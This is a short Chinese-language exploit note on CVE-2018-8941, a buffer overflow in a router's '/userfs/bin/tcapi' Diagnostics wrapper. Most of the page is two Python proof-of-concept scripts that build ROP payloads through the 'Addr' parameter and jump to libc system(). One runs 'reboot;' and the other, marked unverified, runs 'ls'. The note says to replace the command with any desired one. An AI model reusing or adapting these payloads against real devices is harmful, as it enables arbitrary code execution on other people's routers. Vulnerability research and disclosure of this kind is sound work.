目录
Adam Simuntis :: https://twitter.com/adamsimuntis
Mindaugas Slusnys :: https://twitter.com/mislusnys
The buffer overflow vulnerability was found in the "/userfs/bin/tcapi" binary which is used as a wrapper for the "Diagnostics" functionality in the Web GUI.
An authenticated user can pass a long buffer as an 'Addr' parameter to the '/user/bin/tcapi' binary using 'set Diagnostics_Entry' function and cause the memory corruption. Furthermore, it is possible to redirect the flow of the program and execute an arbitrary code.
漏洞poc #
https://github.com/SECFORCE/CVE-2018-8941
执行 执行'system("reboot;")' 如下
import struct
# since we are exploiting through the WEB GUI, binary process mappings (/proc/`pidof boa`/maps) were obtained from '/userfs/bin/boa' binary
libc_base = 0x2b02b000
# 0x59bb0, offset to system(), big endian
libc_system = struct.pack(">I",libc_base+0x59bb0)
rop_pad = 'A'*580
# 3rd: Jump to system() from libC, $a0 contains argument
s0 = libc_system
# 2nd: Load stored command from $a1 to $a0 then jump to next gadget at $s0 -> system(cmd)
#.text:00041980 move $a0, $a1
#.text:00041984 li $a2, 0xC
#.text:00041988 move $t9, $s0
#.text:0004198C jalr $t9 ; memset
s1 = struct.pack(">I",libc_base+0x41980)
s2 = 'BBBB'
s3 = 'CCCC'
# 1st: Load command stored on the stack at ($sp+0x168) to $a1 then jump to next gadget at $s1 ^
#.text:0000C654 addiu $a1, $sp, 0x168+var_150
#.text:0000C658 move $t9, $s1
#.text:0000C65C jalr $t9 ; stat64
ra = struct.pack(">I",libc_base+0xC654)
payload = rop_pad + s0 + s1 + s2 + s3 + ra + "reboot;"*10
修改payload 替换想要执行的命令即可
payload = rop_pad + s0 + s1 + s2 + s3 + ra + "reboot;"*10
POC2 待验证
#ls命令
#!/usr/bin/envpython
import sys
import struct
libc =0x40868000
s0=struct.pack(">I",0x408C1BB0)#system
s1=struct.pack(">I",0x41414141)#useless
s2=struct.pack(">I",0x43434343)#useless
s3=struct.pack(">I",0x44444444)#useless
ra=struct.pack(">I",0x4087E56C)#godget1
x="A"*580+s0+s1+s2+s3+ra+"x"*16+"ls"
